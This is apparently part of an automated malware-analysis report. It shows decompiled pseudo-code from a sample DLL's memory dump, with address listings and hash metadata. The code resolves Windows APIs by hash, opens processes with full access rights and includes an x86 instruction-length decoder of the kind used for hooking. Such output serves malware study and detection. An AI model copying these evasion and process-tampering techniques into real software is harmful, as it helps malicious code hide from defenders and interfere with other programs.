							_t428 = E1000F4E0(_t449 + 0x28, _t323 * 4);
							_t258 =  *(_t449 + 4);
							_t430 =  *_t258;
							__eflags = _t430;
							if(_t430 <= 0) {
								L29:
								_t437 = E1001303C(0x10154545, 0xc2a75cb8);
								__eflags = _t437;
								if(_t437 != 0) {
									_t439 =  *_t437(0x1fffff, 0,  *((intOrPtr*)(E1000F4E0(_t449 + 0x28,  *(_t449 + 0x7c)))));
									__eflags = _t439;
									if(_t439 != 0) {
										E1000F84C( *(_t449 + 4), E1000F4F0( *_t449) + 4);
										 *(E1000F4E0( *(_t449 + 4), E1000F4F0( *_t449) + 0xfffffffc)) = _t439;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) + 1;
										_t269 = E1000F4E0(_t449 + 0x28,  *(_t449 + 0x7c));
										 *(_t449 + 0x70) =  &(( *(_t449 + 4))[1]);
										E1000F84C( *((intOrPtr*)(_t449 + 0x74)), E1000F4F0( &(( *(_t449 + 4))[1])) + 4);
										 *((intOrPtr*)(E1000F4E0( *((intOrPtr*)(_t449 + 0x74)), E1000F4F0( *(_t449 + 0x70)) + 0xfffffffc))) =  *_t269;
										_t277 =  *(_t449 + 4);
										 *_t277 =  *_t277 + 1;
										__eflags =  *_t277;
									}
								}
								goto L32;
							}
							_t438 = 0;
							__eflags = 0;
							 *(_t449 + 0x88) =  &(_t258[1]);
							while(1) {
								_t279 = E1000F4E0( *((intOrPtr*)(_t449 + 0x8c)), _t438 * 4);
								__eflags =  *_t279 -  *_t428;
								if( *_t279 ==  *_t428) {
									break;
								}
								_t438 = _t438 + 1;
								__eflags = _t438 - _t430;
								if(_t438 < _t430) {
									continue;
								}
								goto L29;
							}
							__eflags = _t438 - 0xffffffff;
							if(_t438 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t323 = _t323 + 1;
							__eflags = _t323 -  *(_t449 + 0x20);
						} while (_t323 <  *(_t449 + 0x20));
						goto L33;
					} else {
						_t324 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x64) = _t324 * 4;
							_t429 = E1000F4E0( *(_t449 + 0x7c), _t324 * 4);
							_t430 =  *(_t449 + 0x20);
							__eflags = _t430;
							if(_t430 <= 0) {
								L11:
								_t430 =  &(( *(_t449 + 4))[1]);
								_t283 = E1000F4F0( &(( *(_t449 + 4))[1]));
								__eflags = _t283 -  *(_t449 + 0x64);
								if(_t283 >  *(_t449 + 0x64)) {
									_t443 = 4 + _t324 * 4;
									_t299 = E1000F4F0(_t430);
									__eflags = _t299 - _t443;
									if(_t299 > _t443) {
										 *((intOrPtr*)(_t449 + 0x9c)) = E1000F4E0(_t430,  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0x98)) = E1000F4E0(_t430, _t443);
										E100138C8( *((intOrPtr*)(_t449 + 0xa4)),  *((intOrPtr*)(_t449 + 0x9c)), E1000F4F0(_t430) - _t443);
										_t449 = _t449 + 0xc;
									}
									E1000F84C(_t430, E1000F4F0(_t430) + 0xfffffffc);
									_t308 =  *(_t449 + 4);
									 *_t308 =  *_t308 - 1;
									__eflags =  *_t308;
								}
								_t442 = E1001303C(0xfe338407, 0x77fa1d17);
								__eflags = _t442;
								if(_t442 != 0) {
									 *_t442( *(E1000F4E0( *(_t449 + 4),  *(_t449 + 0x64))));
								}
								_t285 = E1000F4F0( *_t449);
								__eflags = _t285 -  *(_t449 + 0x64);
								if(_t285 >  *(_t449 + 0x64)) {
									_t445 = 4 + _t324 * 4;
									_t287 = E1000F4F0( *_t449);
									__eflags = _t287 - _t445;
									if(_t287 > _t445) {
										_t430 = E1000F4E0( *(_t449 + 4),  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0xa0)) = E1000F4E0( *(_t449 + 4), _t445);
										E100138C8(_t288,  *((intOrPtr*)(_t449 + 0xa4)), E1000F4F0( *_t449) - _t445);
										_t449 = _t449 + 0xc;
									}
									E1000F84C( *(_t449 + 4), E1000F4F0( *_t449) + 0xfffffffc);
									_t296 =  *(_t449 + 4);
									_t33 =  &(_t296[6]);
									 *_t33 = _t296[6] - 1;
									__eflags =  *_t33;
								}
								_t324 = _t324 - 1;
								__eflags = _t324;
								goto L20;
							}
							_t444 = 0;
							__eflags = 0;
							while(1) {
								_t310 = E1000F4E0(_t449 + 0x28, _t444 * 4);
								__eflags =  *_t310 -  *_t429;
								if( *_t310 ==  *_t429) {
									break;
								}
								_t444 = _t444 + 1;
								__eflags = _t444 - _t430;
								if(_t444 < _t430) {
									continue;
								}
								goto L11;
							}
							__eflags = _t444 - 0xffffffff;
							if(_t444 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t324 = _t324 + 1;
							__eflags = _t324 -  *( *(_t449 + 4));
						} while (_t324 <  *( *(_t449 + 4)));
						goto L21;
					}
				}
			}

0x10008479
0x1000847f
0x10008483
0x10008487
0x10008492
0x10008496
0x1000849b
0x100084a3
0x100084b3
0x00000000
0x100084b5
0x100084bd
0x100084c4
0x100084c4
0x10008a17
0x10008a19
0x10008a5a
0x10008a5c
0x10008a6b
0x10008a77
0x10008a77
0x10008a66
0x10008a7d
0x10008a82
0x00000000
0x10008a82
0x10008a6a
0x00000000
0x100084ce
0x100084d2
0x100084d5
0x100085dd
0x100085dd
0x100085e2
0x10008705
0x10008709
0x1000870e
0x10008712
0x10008716
0x1000884c
0x1000884e
0x10008852
0x1000885b
0x10008866
0x1000886a
0x10008873
0x10008878
0x1000887e
0x1000887f
0x10008883
0x10008887
0x1000888e
0x10008890
0x100089d0
0x100089e1
0x100089e8
0x100089ef
0x100089ef
0x100089f2
0x100089f5
0x100089f8
0x100089fe
0x10008a05
0x10008a09
0x10008a12
0x00000000
0x10008a12
0x10008a00
0x10008a03
0x10008a1c
0x10008a34
0x10008a37
0x10008a3c
0x10008a46
0x10008a49
0x10008a4c
0x10008a55
0x00000000
0x10008a55
0x00000000
0x10008a03
0x10008898
0x10008898
0x1000889a
0x1000889e
0x100088a3
0x100088a5
0x100088a9
0x100088ac
0x100088b4
0x100088b6
0x00000000
0x00000000
0x100088cd
0x100088e8
0x100088ea
0x100088f8
0x100088fd
0x100088ff
0x1000891c
0x1000891c
0x10008920
0x10008922
0x00000000
0x00000000
0x10008924
0x10008927
0x10008948
0x10008967
0x1000896d
0x10008970
0x10008975
0x10008976
0x1000897d
0x00000000
0x00000000
0x10008985
0x10008985
0x10008987
0x10008993
0x1000899f
0x100089c1
0x100089c6
0x100089c7
0x100089c7
0x00000000
0x10008987
0x00000000
0x10008927
0x10008901
0x10008907
0x10008909
0x1000890a
0x1000890b
0x1000890c
0x10008910
0x10008914
0x10008916
0x10008917
0x10008918
0x1000891a
0x00000000
0x00000000
0x00000000
0x1000891a
0x1000892d
0x00000000
0x1000892d
0x1000871c
0x1000871e
0x10008720
0x00000000
0x00000000
0x1000872a
0x1000872a
0x1000872c
0x1000872f
0x10008731
0x10008739
0x10008740
0x10008744
0x10008747
0x00000000
0x00000000
0x10008843
0x10008844
0x10008846
0x00000000
0x00000000
0x00000000
0x10008846
0x1000874d
0x10008750
0x10008759
0x1000875e
0x10008760
0x1000876c
0x10008770
0x10008775
0x10008779
0x10008b56
0x10008b6a
0x10008b8c
0x10008b91
0x10008b91
0x1000878f
0x10008794
0x10008798
0x10008798
0x10008798
0x10008798
0x1000879d
0x100087a2
0x100087a4
0x100087a8
0x100087af
0x100087b4
0x100087b6
0x10008b17
0x10008b26
0x10008b3f
0x10008b44
0x10008b44
0x100087c9
0x100087ce
0x100087d2
0x100087d2
0x100087d2
0x100087e4
0x10008805
0x1000880d
0x1000881b
0x10008839
0x1000883f
0x1000883f
0x00000000
0x10008750
0x100085e8
0x100085e8
0x100085ea
0x100085f1
0x100085ff
0x10008601
0x10008605
0x10008607
0x10008609
0x10008644
0x10008653
0x10008655
0x10008657
0x10008675
0x10008677
0x10008679
0x1000868b
0x100086a9
0x100086b2
0x100086b5
0x100086c3
0x100086d4
0x100086f2
0x100086f4
0x100086f8
0x100086f8
0x100086f8
0x10008679
0x00000000
0x10008657
0x1000860f
0x1000860f
0x10008614
0x1000861b
0x1000862a
0x10008631
0x10008633
0x00000000
0x00000000
0x1000863f
0x10008640
0x10008642
0x00000000
0x00000000
0x00000000
0x10008642
0x10008635
0x10008638
0x00000000
0x00000000
0x100086fa
0x100086fa
0x100086fb
0x100086fb
0x00000000
0x100084db
0x100084db
0x100084db
0x100084dd
0x100084e4
0x100084f2
0x100084f4
0x100084f8
0x100084fa
0x10008526
0x1000852a
0x1000852f
0x10008534
0x10008538
0x1000853c
0x10008543
0x10008548
0x1000854a
0x10008ad9
0x10008ae8
0x10008b07
0x10008b0c
0x10008b0c
0x1000855d
0x10008562
0x10008566
0x10008566
0x10008566
0x10008577
0x10008579
0x1000857b
0x1000858c
0x1000858c
0x10008591
0x10008596
0x1000859a
0x1000859f
0x100085a6
0x100085ab
0x100085ad
0x10008a9b
0x10008aa7
0x10008ac1
0x10008ac6
0x10008ac6
0x100085c3
0x100085c8
0x100085cc
0x100085cc
0x100085cc
0x100085cc
0x100085cf
0x100085cf
0x00000000
0x100085cf
0x100084fe
0x100084fe
0x10008500
0x1000850c
0x10008513
0x10008515
0x00000000
0x00000000
0x10008521
0x10008522
0x10008524
0x00000000
0x00000000
0x00000000
0x10008524
0x10008517
0x1000851a
0x00000000
0x00000000
0x100085d0
0x100085d4
0x100085d5
0x100085d5
0x00000000
0x100084dd
0x100084d5

Strings

, xrefs: 10008A5E

Memory Dump Source

Source File: 00000004.00000002.326004095.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.325983786.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.326199252.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.326242722.000000001001D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.326285629.000000001001F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 266ae0aa41588889d6e07c1329cba2c42d36b2c35c2c7b47e4ee99840d115ec2
Instruction ID: 1bb0d61435caef0e58cc5acfc0dead8aa63cbeb4aacce1040875febecc2d3119
Opcode Fuzzy Hash: 266ae0aa41588889d6e07c1329cba2c42d36b2c35c2c7b47e4ee99840d115ec2
Instruction Fuzzy Hash: 76126C752083049FE714DF24C981A6FB7E5FF85784F10892DF999872AAEB30AD04DB42

Uniqueness

Uniqueness Score: -1.00%

Function 10019348, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10019348(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				signed int _t250;
				signed char _t251;
				signed char* _t254;
				char _t255;
				signed short _t256;
				char _t257;
				signed short _t260;
				signed int _t261;
				signed int _t262;
				void* _t264;
				void* _t272;
				void* _t273;
				signed short* _t274;
				signed char _t275;
				signed int _t277;
				signed int _t278;
				void* _t282;
				signed int _t288;
				unsigned int _t290;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				unsigned int _t296;
				unsigned int _t297;
				signed int _t299;
				unsigned int _t301;
				signed char _t302;
				signed int _t304;
				signed char _t307;
				signed char _t308;
				signed int _t309;
				void* _t312;
				void* _t313;
				signed int _t314;
				signed int _t316;
				signed int _t319;
				signed int _t321;
				signed int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				unsigned int* _t346;
				unsigned int _t354;
				signed int _t355;
				void* _t357;
				signed int _t364;
				signed int _t366;
				signed int _t383;
				signed int _t388;
				signed int _t391;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t403;
				signed int _t408;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t417;
				signed int _t419;
				signed int _t424;
				void* _t426;
				signed int* _t427;

				 *((intOrPtr*)(_t426 + 0x24)) = __edx;
				 *((intOrPtr*)(_t426 + 0x10)) = __ecx;
				 *((intOrPtr*)(_t426 + 0x14)) = __ecx;
				_t274 =  *(_t426 + 0x48);
				E10013670( *(_t426 + 0x48), 0, 0x1c);
				_t427 = _t426 + 0xc;
				_t338 = 0;
				_t282 = 0x10;
				do {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					if(_t250 == 0xf3) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000004;
						L17:
						_t338 = _t339 & 0x000000ff;
						 *(_t383 + 1) = _t250;
						goto L18;
					}
					if(_t250 == 0xf2) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000002;
						goto L17;
					}
					if(_t250 == 0xf0) {
						_t338 = (_t338 | 0x00000020) & 0x000000ff;
						 *(_t427[0x10] + 2) = _t250;
						goto L18;
					}
					if(_t250 == 0x26 || _t250 == 0x2e || _t250 == 0x36 || _t250 == 0x3e) {
						L13:
						_t338 = (_t338 | 0x00000040) & 0x000000ff;
						 *(_t427[0x10] + 3) = _t250;
					} else {
						_t6 = _t250 - 0x64; // -100
						if(_t6 <= 1) {
							goto L13;
						}
						if(_t250 == 0x66) {
							_t338 = (_t338 | 0x00000008) & 0x000000ff;
							 *(_t427[0x10] + 4) = _t250;
							goto L18;
						}
						if(_t250 != 0x67) {
							break;
						} else {
							_t338 = _t338 | 0x00000010;
							 *(_t427[0x10] + 5) = _t250;
							goto L18;
						}
					}
					L18:
					_t282 = _t282 + 0xff;
				} while (_t282 != 0);
				_t388 = _t427[0x10];
				_t285 =  !=  ? _t338 : 1;
				_t343 = _t338 << 0x17;
				 *(_t388 + 6) = _t250;
				 *_t427 =  !=  ? _t338 : 1;
				 *(_t388 + 0x18) = _t343;
				if(_t250 == 0xf) {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					_t427[5] = _t250;
					 *(_t427[0x10] + 7) = _t250;
					_t427[2] = _t427[4] + 0x4a;
				} else {
					_t22 = _t250 - 0xa0; // -160
					_t427[5] =  *(_t427[0x10] + 7) & 0x000000ff;
					if(_t22 <= 3) {
						_t424 =  *_t427;
						_t382 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
						 *_t427 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
					}
				}
				_t354 = _t250 >> 2;
				_t391 = _t250 & 0x00000003;
				_t345 = _t427[2];
				_t427[3] = _t391;
				_t427[6] = _t354;
				_t288 =  *(( *(_t354 + _t345) & 0x000000ff) + _t391 + _t345) & 0x000000ff;
				_t427[1] = _t288;
				if(_t288 == 0xff) {
					_t343 = _t343 + 0x3000;
					_t288 = 0 | (_t250 & 0xfffffffd) == 0x00000024;
					 *(_t427[0x10] + 0x18) = _t343;
					_t427[1] = _t288;
				}
				if((_t427[1] & 0x00000080) != 0) {
					_t290 =  *((_t288 & 0x0000007f) + _t345) & 0x0000ffff;
					_t427[1] = _t290;
					_t395 = _t290 >> 8;
				} else {
					_t395 = 0;
				}
				if(_t427[5] != 0 && ( *_t427 &  *(( *(_t427[6] + _t427[4] + 0x130) & 0x000000ff) + _t427[3] + _t427[4] + 0x130) & 0x000000ff) != 0) {
					_t343 = _t343 | 0x00003000;
					 *(_t427[0x10] + 0x18) = _t343;
				}
				if((_t427[1] & 0x00000001) == 0) {
					if(( *_t427 & 0x00000020) != 0) {
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					goto L114;
				} else {
					_t355 = _t427[0x10];
					_t343 = _t343 | 0x00000001;
					 *(_t355 + 0x18) = _t343;
					_t296 =  *_t274 & 0x000000ff;
					_t346 =  &(_t427[6]);
					 *_t346 = _t296;
					 *(_t355 + 8) = _t296;
					_t297 = _t296 >> 6;
					_t427[3] = _t297;
					 *(_t355 + 9) = _t297;
					_t299 =  *_t346 & 0x00000007;
					_t427[7] = _t299;
					 *(_t355 + 0xb) = _t299;
					_t301 =  *_t346 & 0x0000003f;
					 *_t346 = _t301;
					_t302 = _t301 >> 3;
					_t427[2] = _t302;
					 *(_t355 + 0xa) = _t302;
					if(_t395 != 0 && (_t395 << _t302 & 0x00000080) != 0) {
						_t343 = _t343 | 0x00003000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					if(_t427[5] == 0) {
						_t80 = _t250 - 0xd9; // -217
						if(_t80 <= 6) {
							_t81 = _t250 + 0x27; // 0x27
							_t417 = _t81 & 0x000000ff;
							if(_t427[3] != 3) {
								_t419 = ( *(_t417 + _t427[4] + 0xf1) & 0x000000ff) << _t427[2];
							} else {
								_t419 = ( *(_t427[4] + _t427[2] + 0xf8 + _t417 * 8) & 0x000000ff) << _t427[7];
							}
							if((_t419 & 0x00000080) != 0) {
								_t343 = _t343 | 0x00003000;
								 *(_t427[0x10] + 0x18) = _t343;
							}
						}
					}
					if(( *_t427 & 0x00000020) == 0) {
						L52:
						if(_t427[5] == 0) {
							if(_t250 == 0x8c) {
								L85:
								if(_t427[2] <= 5) {
									L87:
									_t427[5] = _t274[0];
									_t427[4] =  &(_t274[1]);
									if(_t427[2] <= 1) {
										if(_t250 != 0xf6) {
											_t309 = _t427[1];
											_t310 =  ==  ? _t309 | 0xffffff90 : _t309;
											_t427[1] =  ==  ? _t309 | 0xffffff90 : _t309;
										} else {
											_t427[1] = _t427[1] | 0xffffff82;
										}
									}
									if(_t427[3] == 0) {
										if(( *_t427 & 0x00000010) == 0) {
											_t264 = 4;
											_t357 =  ==  ? _t264 : 0;
										} else {
											_t273 = 2;
											_t357 =  ==  ? _t273 : 0;
										}
									} else {
										if(_t427[3] == 1) {
											_t357 = 1;
										} else {
											if(_t427[3] == 2) {
												_t357 = (( !( *_t427) & 0x00000010) >> 3) + 2;
											} else {
												_t357 = 0;
											}
										}
									}
									if(_t427[3] != 3 && _t427[7] == 4 && ( *_t427 & 0x00000010) == 0) {
										_t307 = _t427[5];
										_t343 = _t343 | 0x00000002;
										_t403 = _t427[0x10];
										_t427[4] =  &(_t274[1]);
										 *(_t403 + 0xc) = _t307;
										_t308 = _t307 & 0x00000007;
										 *(_t403 + 0x18) = _t343;
										 *(_t403 + 0xd) = _t307 >> 6;
										 *(_t403 + 0xe) = (_t307 & 0x0000003f) >> 3;
										 *(_t403 + 0xf) = _t308;
										if(_t308 == 5) {
											_t272 = 4;
											_t357 =  ==  ? _t272 : _t357;
										}
									}
									if(_t357 == 1) {
										_t304 = _t427[0x10];
										_t343 = _t343 | 0x00000020;
										 *(_t304 + 0x18) = _t343;
										 *((char*)(_t304 + 0x14)) =  *(_t427[4] - 1);
									} else {
										if(_t357 == 2) {
											_t277 = _t427[0x10];
											_t343 = _t343 | 0x00000040;
											 *(_t277 + 0x18) = _t343;
											 *((short*)(_t277 + 0x14)) =  *(_t427[4] - 1) & 0x0000ffff;
										} else {
											if(_t357 == 4) {
												_t278 = _t427[0x10];
												_t343 = _t343 | 0x00000080;
												 *(_t278 + 0x18) = _t343;
												 *(_t278 + 0x14) =  *(_t427[4] - 1);
											}
										}
									}
									_t195 = _t427[4] - 1; // -1
									_t274 = _t357 + _t195;
									L114:
									_t251 = _t427[1];
									_t292 = _t251 & 0x00000040;
									if((_t251 & 0x00000010) == 0) {
										L121:
										if((_t427[1] & 0x00000004) == 0) {
											L129:
											if((_t427[1] & 0x00000002) != 0) {
												_t396 = _t427[0x10];
												_t343 = _t343 | 0x00000004;
												 *(_t396 + 0x18) = _t343;
												_t257 =  *_t274;
												_t274 =  &(_t274[0]);
												 *((char*)(_t396 + 0x10)) = _t257;
											}
											if(_t292 == 0) {
												if((_t427[1] & 0x00000020) != 0) {
													_t293 = _t427[0x10];
													_t343 = _t343 | 0x00000104;
													 *(_t293 + 0x18) = _t343;
													_t255 =  *_t274;
													_t274 =  &(_t274[0]);
													 *((char*)(_t293 + 0x10)) = _t255;
												}
												goto L135;
											} else {
												L132:
												_t294 = _t427[0x10];
												_t343 = _t343 | 0x00000110;
												 *(_t294 + 0x18) = _t343;
												_t256 =  *_t274;
												_t274 =  &(_t274[2]);
												 *(_t294 + 0x10) = _t256;
												L135:
												_t275 = _t274 - _t427[0xf];
												if(_t275 <= 0xf) {
													 *(_t427[0x10]) = _t275;
												} else {
													_t254 = _t427[0x10];
													_t275 = 0xf;
													_t254[0x18] = _t343 | 0x00005000;
													 *_t254 = _t275;
												}
												return _t275 & 0x000000ff;
											}
										}
										if((_t343 & 0x00000010) == 0) {
											if((_t343 & 0x00000008) == 0) {
												_t397 = _t427[0x10];
												_t343 = _t343 | 0x00000008;
												 *(_t397 + 0x18) = _t343;
												 *((short*)(_t397 + 0x10)) =  *_t274 & 0x0000ffff;
												L128:
												_t274 =  &(_t274[1]);
												goto L129;
											}
											_t398 = _t427[0x10];
											_t343 = _t343 | 0x00000800;
											L126:
											 *(_t398 + 0x18) = _t343;
											 *((short*)(_t398 + 0x14)) =  *_t274 & 0x0000ffff;
											goto L128;
										}
										_t398 = _t427[0x10];
										_t343 = _t343 | 0x00000008;
										goto L126;
									}
									if(_t292 == 0) {
										if(( *_t427 & 0x00000008) == 0) {
											_t399 = _t427[0x10];
											_t343 = _t343 | 0x00000010;
											 *(_t399 + 0x18) = _t343;
											_t260 =  *_t274;
											_t274 =  &(_t274[2]);
											 *(_t399 + 0x10) = _t260;
										} else {
											_t400 = _t427[0x10];
											_t343 = _t343 | 0x00000008;
											 *(_t400 + 0x18) = _t343;
											_t261 =  *_t274 & 0x0000ffff;
											_t274 =  &(_t274[1]);
											 *(_t400 + 0x10) = _t261;
										}
										goto L121;
									}
									if(( *_t427 & 0x00000008) == 0) {
										goto L132;
									}
									_t295 = _t427[0x10];
									_t343 = _t343 | 0x00000108;
									 *(_t295 + 0x18) = _t343;
									_t262 =  *_t274 & 0x0000ffff;
									_t274 =  &(_t274[1]);
									 *(_t295 + 0x10) = _t262;
									goto L135;
								}
								L86:
								_t343 = _t343 | 0x00011000;
								 *(_t427[0x10] + 0x18) = _t343;
								goto L87;
							}
							if(_t250 != 0x8e) {
								L66:
								if(_t427[3] != 3) {
									if(_t427[5] == 0) {
										goto L87;
									}
									if(_t250 == 0xd7 || _t250 == 0xf7) {
										L83:
										if(( *_t427 & 0x00000009) != 0) {
											goto L86;
										}
									} else {
										if(_t250 == 0xd6) {
											if(( *_t427 & 0x00000006) != 0) {
												goto L86;
											}
											goto L87;
										}
										if(_t250 == 0xc5) {
											goto L86;
										}
										if(_t250 == 0x50) {
											goto L83;
										}
									}
									goto L87;
								}
								_t364 = _t427[4];
								_t312 = _t364 + 0x1da;
								_t366 =  !=  ? _t312 : _t364 + 0x1cb;
								_t313 =  !=  ? _t427[9] + _t364 : _t312;
								_t427[4] = _t366;
								if(_t366 == _t313) {
									goto L87;
								} else {
									goto L68;
								}
								while(1) {
									L68:
									_t408 = _t427[4];
									if(_t250 ==  *_t408) {
										break;
									}
									_t411 = _t408 + 3;
									_t427[4] = _t411;
									if(_t411 != _t313) {
										continue;
									}
									goto L87;
								}
								_t314 = _t408;
								if(( *_t427 &  *(_t314 + 1) & 0x000000ff) == 0) {
									goto L87;
								}
								if((( *(_t314 + 2) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
									goto L86;
								}
								goto L87;
							}
							if(_t427[2] == 1) {
								goto L86;
							}
							goto L85;
						}
						if(_t250 == 0x20 || _t250 == 0x22) {
							_t316 = 3;
							_t427[3] = _t316;
							if(_t427[2] > 4 || _t427[2] == 1) {
								goto L86;
							} else {
								goto L87;
							}
						} else {
							if(_t250 == 0x21 || _t250 == 0x23) {
								_t319 = 3;
								_t427[3] = _t319;
								if((_t427[6] & 0xfffffff0) == 0x20) {
									goto L86;
								}
								goto L87;
							} else {
								goto L66;
							}
						}
					}
					if(_t427[3] == 3) {
						L51:
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
						goto L52;
					}
					_t412 = _t427[4];
					_t321 = _t250;
					_t427[8] = _t412 + 0x1b9;
					if(_t427[5] == 0) {
						_t413 = _t412 + 0x1a1;
						_t321 = _t250 & 0x000000fe;
					} else {
						_t413 = _t427[8];
						_t427[8] = _t412 + 0x1cb;
					}
					while(_t413 != _t427[8]) {
						if(_t321 ==  *_t413) {
							if((( *(_t413 + 1) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
								goto L52;
							}
							goto L51;
						}
						_t413 = _t413 + 2;
					}
					goto L51;
				}
			}

0x1001934f
0x10019353
0x1001935f
0x10019363
0x10019367
0x1001936c
0x1001936f
0x10019371
0x10019373
0x10019373
0x10019376
0x1001937c
0x100193f4
0x100193f8
0x100193fb
0x100193fb
0x100193fe
0x00000000
0x100193fe
0x10019383
0x100193eb
0x100193ef
0x00000000
0x100193ef
0x1001938a
0x100193e3
0x100193e6
0x00000000
0x100193e6
0x1001938f
0x100193cd
0x100193d4
0x100193d7
0x100193a0
0x100193a0
0x100193a6
0x00000000
0x00000000
0x100193ab
0x100193c5
0x100193c8
0x00000000
0x100193c8
0x100193b0
0x00000000
0x100193b2
0x100193b6
0x100193b9
0x00000000
0x100193b9
0x100193b0
0x10019401
0x10019401
0x10019401
0x1001940a
0x10019413
0x10019416
0x10019419
0x1001941c
0x1001941f
0x10019425
0x10019467
0x1001946a
0x1001946b
0x10019472
0x10019475
0x10019427
0x1001942b
0x10019435
0x1001943c
0x1001943e
0x10019457
0x1001945a
0x1001945a
0x1001943c
0x1001947d
0x10019480
0x10019483
0x10019487
0x1001948b
0x10019495
0x10019499
0x100194a3
0x100194ac
0x100194b9
0x100194bc
0x100194bf
0x100194bf
0x100194cb
0x100194d6
0x100194dc
0x100194e0
0x100194cd
0x100194cd
0x100194cd
0x100194e8
0x10019512
0x10019518
0x10019518
0x10019520
0x100198c9
0x100198cf
0x100198d5
0x100198d5
0x00000000
0x10019526
0x10019526
0x1001952a
0x1001952d
0x10019530
0x10019533
0x10019537
0x10019539
0x1001953c
0x1001953f
0x10019543
0x10019548
0x1001954b
0x1001954f
0x10019554
0x10019557
0x10019559
0x1001955c
0x10019560
0x10019565
0x10019575
0x1001957b
0x1001957b
0x10019583
0x10019585
0x1001958e
0x10019590
0x10019593
0x1001959e
0x100195cb
0x100195a0
0x100195b7
0x100195b7
0x100195d3
0x100195d9
0x100195df
0x100195df
0x100195d3
0x1001958e
0x100195e6
0x10019657
0x1001965c
0x100196b5
0x10019777
0x1001977c
0x1001978b
0x10019791
0x10019795
0x1001979e
0x100197a5
0x100197ae
0x100197bc
0x100197bf
0x100197a7
0x100197a7
0x100197a7
0x100197a5
0x100197c8
0x100197f5
0x10019808
0x10019810
0x100197f7
0x100197f9
0x10019801
0x10019801
0x100197ca
0x100197cf
0x100197ee
0x100197d1
0x100197d6
0x100197e7
0x100197d8
0x100197d8
0x100197d8
0x100197d6
0x100197cf
0x10019818
0x10019827
0x10019834
0x1001983d
0x10019841
0x10019845
0x10019848
0x1001984b
0x1001984e
0x10019851
0x10019854
0x1001985a
0x1001985e
0x10019864
0x10019864
0x1001985a
0x1001986a
0x100198a7
0x100198ab
0x100198b2
0x100198b8
0x1001986c
0x1001986f
0x1001988f
0x10019893
0x1001989a
0x100198a1
0x10019871
0x10019874
0x10019876
0x1001987a
0x10019884
0x1001988a
0x1001988a
0x10019874
0x1001986f
0x100198bf
0x100198bf
0x100198d8
0x100198d8
0x100198de
0x100198e3
0x1001993d
0x10019942
0x10019981
0x10019986
0x10019988
0x1001998c
0x1001998f
0x10019992
0x10019994
0x10019995
0x10019995
0x1001999a
0x100199b8
0x100199ba
0x100199be
0x100199c4
0x100199c7
0x100199c9
0x100199ca
0x100199ca
0x00000000
0x1001999c
0x1001999c
0x1001999c
0x100199a0
0x100199a6
0x100199a9
0x100199ab
0x100199ae
0x100199cd
0x100199cd
0x100199d4
0x100199ee
0x100199d6
0x100199d6
0x100199e2
0x100199e3
0x100199e6
0x100199e6
0x100199fc
0x100199fc
0x1001999a
0x10019947
0x10019955
0x1001996d
0x10019971
0x10019974
0x1001997a
0x1001997e
0x1001997e
0x00000000
0x1001997e
0x10019957
0x1001995b
0x10019961
0x10019961
0x10019967
0x00000000
0x10019967
0x10019949
0x1001994d
0x00000000
0x1001994d
0x100198e7
0x10019913
0x1001992b
0x1001992f
0x10019932
0x10019935
0x10019937
0x1001993a
0x10019915
0x10019915
0x10019919
0x1001991c
0x1001991f
0x10019922
0x10019925
0x10019925
0x00000000
0x10019913
0x100198ed
0x00000000
0x00000000
0x100198f3
0x100198f7
0x100198fd
0x10019900
0x10019903
0x10019906
0x00000000
0x10019906
0x1001977e
0x10019782
0x10019788
0x00000000
0x10019788
0x100196c0
0x100196d2
0x100196d7
0x10019742
0x00000000
0x00000000
0x10019749
0x1001976f
0x10019773
0x00000000
0x00000000
0x10019752
0x10019757
0x1001976b
0x00000000
0x00000000
0x00000000
0x1001976d
0x1001975e
0x00000000
0x00000000
0x10019763
0x00000000
0x00000000
0x10019765
0x00000000
0x10019749
0x100196d9
0x100196e3
0x100196f4
0x100196f7
0x100196fa
0x10019700
0x00000000
0x00000000
0x00000000
0x00000000
0x10019706
0x10019706
0x10019706
0x1001970d
0x00000000
0x00000000
0x1001970f
0x10019712
0x10019718
0x00000000
0x00000000
0x00000000
0x1001971a
0x1001971c
0x10019725
0x00000000
0x00000000
0x10019739
0x00000000
0x00000000
0x00000000
0x1001973b
0x100196c7
0x00000000
0x00000000
0x00000000
0x100196cd
0x10019661
0x10019690
0x10019691
0x1001969a
0x00000000
0x100196ab
0x00000000
0x100196ab
0x10019668
0x1001966b
0x1001967e
0x1001967f
0x10019683
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1001966b
0x10019661
0x100195ed
